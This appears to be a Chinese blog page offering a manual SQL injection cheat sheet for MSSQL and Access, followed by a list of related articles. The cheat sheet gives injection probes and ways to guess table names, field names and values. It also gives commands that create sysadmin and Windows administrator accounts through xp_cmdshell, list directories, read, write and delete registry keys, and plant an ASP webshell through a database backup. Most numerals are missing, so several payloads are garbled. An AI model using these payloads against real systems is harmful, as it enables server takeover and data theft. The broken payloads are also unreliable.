.判断是否有注入;and = ;and =
  .初步判断是否是mssql ;and user>   .注入参数是字符and [查询条件] and =   .搜索时没过滤参数的and [查询条件] and %=   .判断数据库系统   ;and (select count(*) from sysobjects)> mssql   ;and (select count(*) from msysobjects)> access   .猜数据库 ;and (select Count(*) from [数据库名])>   .猜字段 ;and (select Count(字段名) from 数据库名)>   .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)>   .()猜字段的ascii值(access)   ;and (select top asc(mid(字段名,,)) from 数据库名)>   ()猜字段的ascii值(mssql)   ;and (select top unicode(substring(字段名,,)) from 数据库名)>   .测试权限结构(mssql)   ;and =(select IS_SRVROLEMEMBER(sysadmin));--   ;and =(select IS_SRVROLEMEMBER(serveradmin));--   ;and =(select IS_SRVROLEMEMBER(setupadmin));--   ;and =(select IS_SRVROLEMEMBER(securityadmin));--   ;and =(select IS_SRVROLEMEMBER(diskadmin));--   ;and =(select IS_SRVROLEMEMBER(bulkadmin));--   ;and =(select IS_MEMBER(db_owner));--   .添加mssql和系统的帐户   ;exec master.dbo.sp_addlogin username;--
  ;exec master.dbo.sp_password null,username,password;--   ;exec master.dbo.sp_addsrvrolemember sysadmin username;--   ;exec master.dbo.xp_cmdshell net user username password   /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;--   ;exec master.dbo.xp_cmdshell net user username password /add;--   ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--   .()遍历目录   ;create table dirs(paths varchar(), id int)   ;insert dirs exec master.dbo.xp_dirtree c:   ;and (select top paths from dirs)>   ;and (select top paths from dirs where paths not in(上步得到的paths))>)   ()遍历目录   ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构   ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容   .mssql中的存储过程   xp_regenumvalues 注册表根键, 子键   ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值   xp_regread 根键,子键,键值名   ;exec xp_regread   HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值   xp_regwrite 根键,子键, 值名, 值类型, 值   值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表   xp_regdeletevalue 根键,子键,值名   exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值   xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值   .mssql的backup创建webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=c:l.asp;   .mssql内置函数   ;and (select @@version)> 获得Windows的版本号   ;and user_name()=dbo 判断当前系统的连接用户是不是sa   ;and (select user_name())> 爆当前系统的连接用户   ;and (select db_name())> 得到当前连接的数据库   .简洁的webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=g:wwwtestl.asp;

手动方式SQL注入脚本命令之精华版的更多相关文章

  1. SQL注入常用命令

    1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...

  2. phpcms v9 sql注入脚本

    phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...

  3. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  4. 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)

    前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...

  5. 常规SQL注入脚本

    一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...

  6. SQL注入脚本(基于时间)

    #encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...

  7. 禁用substr、substring、mid函数的sql注入脚本

    #encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...

  8. SQL注入技术专题—由浅入深【精华聚合】

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...

  9. SQL注入学习资料总结

    转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...

随机推荐

  1. PyQt5教程——对话框(6)

    PyQt5中的对话框 对话框窗口或对话框是大多数主流GUI应用不可缺少的部分.对话是两个或更多人之间的会话.在计算机应用中,对话框是一个用来和应用对话的窗口.对话框可以用来输入数据,修改数据,改变应用 ...

  2. 用Postfix + Dovecot 搭建的邮件server被垃圾邮件其中转server的处理

    今天发邮件. 发送失败.然后到server上看日志, 发现硬盘被垃圾邮件的缓存队列和日志塞满了. tail    -f    /var/log/maillog   发现疯狂刷屏.部分日志例如以下 : ...

  3. hadoop的namenode无法启动的解决的方法

    安装hadoop集群时,启动集群,发现master节点的namenode没有启动成功.这一般都是没有格式格式化namenode的缘故.格式化一下就可以,格式化namenode的命令:在hadoop安装 ...

  4. 生成CFree 5.0 注册码

    C-Free 5.0真是一个很棒的编程软件,可今天用着用着却让我注册,下面的注册码分享给大家: 方法一.下载CFree 5.0之后,直接输入以下信息进行注册. 用户名:tianfang电子邮件:qua ...

  5. 在ListView的右边添加字母列表

    在ListView的右边添加字母列表,点击某个字母时,列表就滚动到预期位置. <!-- 数字和字母栏在标题栏下边并且停靠在右边 --> <com.txrj.sms.component ...

  6. PHP原生实现,校验微信公众号||小程序服务器地址

    1.原生的.php文件:  test.php <?php header('Content-type:text'); define("TOKEN", "weixin& ...

  7. php替换str_replace的使用方法,支持多个替换

    废话不多说,直接上代码: str_replace(['a','b','c'],'a',$str);//a或b或c都替换成a str_replace(['a','b','c'],['d','e','f' ...

  8. cxf之GET,POST,PUT,DELETE的区别

    GET,POST,PUT,DELETE的区别 注意: 文中有错误地方:关于增改删查正确的描述应为: get对应的是查询post对应的是保存/增加delete对应的是删除put对应的是更新

  9. 使用EditPlus技巧,提高工作效率(附英文版、自动完成文件、语法文件下载)

    http://www.cnblogs.com/JustinYoung/archive/2008/01/14/editplus-skills.html

  10. Linux命令-定时任务命令:crontab

    linux定时任务命令相当于windows=>附件=>系统工具=>计划任务程序. 要想让linux定时任务生效,首先应该先启动crond服务,并且给这个服务设置开机自自动. 默认li ...